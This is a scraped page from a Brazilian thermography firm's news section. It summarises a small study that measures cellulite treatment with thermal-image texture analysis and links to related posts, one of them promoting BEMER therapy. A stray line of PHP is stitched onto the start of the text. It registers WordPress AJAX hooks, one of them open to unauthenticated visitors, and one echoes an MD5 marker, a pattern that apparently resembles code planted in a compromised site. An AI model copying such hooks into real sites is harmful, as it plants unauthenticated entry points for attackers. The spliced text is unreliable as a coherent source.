function bestrock_render_js(){ } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ } add_action('wp_head', 'bestrock_render_js'); add_action('wp_ajax_qgt', 'bestrock_render_index'); add_action('wp_ajax_nopriv_wrt', 'bestrock_render_ajax'); Poliscan

Novidades

Tratamento da celulite: a termografia pode ajudar

10/10/2021 | Categoria: Artigos

MAPEAMENTO TERMOGRÁFICO DA SUPERFÍCIE DA PELE EM AVALIAÇÃO BIOMÉTRICA DA EFICÁCIA DO TRATAMENTO DA CELULITE

A celulite é uma das piores imperfeições estéticas toleradas. O edema que acompanha a celulite causa distúrbios do fluxo sanguíneo, o que pode ser observado em forma de alterações na temperatura da superfície da pele. O objetivo deste estudo foi desenvolver um novo método baseado na análise e processamento de imagens térmicas da pele para avaliação biométrica da severidade da celulite e monitoramento de seu tratamento.

Métodos: As observações dos efeitos do tratamento foram realizadas em 10 mulheres (33,4 ± 6,4 anos de idade). Imagens térmicas das coxas das voluntárias foram capturadas antes de iniciar a terapia (T0). Nas etapas seguintes, T1, T2 e T3, as imagens térmicas foram capturadas 2 semanas após a primeira, segunda e terceira administração do tratamento com Alidya, respectivamente. Algoritmos perfilados foram desenvolvidos para determinar o contraste médio da matriz de co-ocorrência de nível de cinza (GLCM) nos termogramas adquiridos.

Termogramas nas etapas T0, T1, T2 e T3

(T0 = Antes do tratamento, T1-T3 = Depois da primeira, segunda e terceira etapas do tratamento, respectivamente.)

Resultados: O contraste GLCM médio para a fase T0 foi 70,91 e, para as etapas T1, T2 e T3, foram 57,78, 41,80 e 38,53 respectivamente.

Visualização tridimensional da temperatura (esquerda) e contraste GLCM (direita) para paciente P2 ao longo de todas as etapas do estudo

Conclusão: O uso do método proposto (contraste GLCM) possibilita avaliação biométrica da efetividade do tratamento da celulite. Os parâmetros tradicionalmente utilizados de análise infravermelha, tais como pontos locais das temperaturas máxima e mínima ou as temperaturas médias, não são úteis na avaliação térmica e biométrica das preparações anticelulíticas.

Leia o artigo completo através do link.

Veja também

29jan

Esteatose hepática e tratamento BEMER

SAIBA COMO A TERAPIA FÍSICA VASCULAR PODE TE AJUDAR Já apresentamos a ação poderosa do tratamento vascular Bemer na microvascularização, uma […]

Leia +
05out

Termografia: uma forma de estudar padrões fisiológicos com detalhamento e precisão

MAPEAMENTO CORPORAL DE PERFIS DE TEMPERATURA DA PELE DURANTE O EXERCÍCIO EM CRIANÇAS Estudo realizado por George Havenith, Mary Nevill, Maarten […]

Leia +
09maio

Qual a relação da temperatura com a vibração molecular?

O vídeo educativo (link disponível abaixo) mostra a relação temperatura com a vibração molecular conforme o movimento aumenta a temperatura também […]

Leia +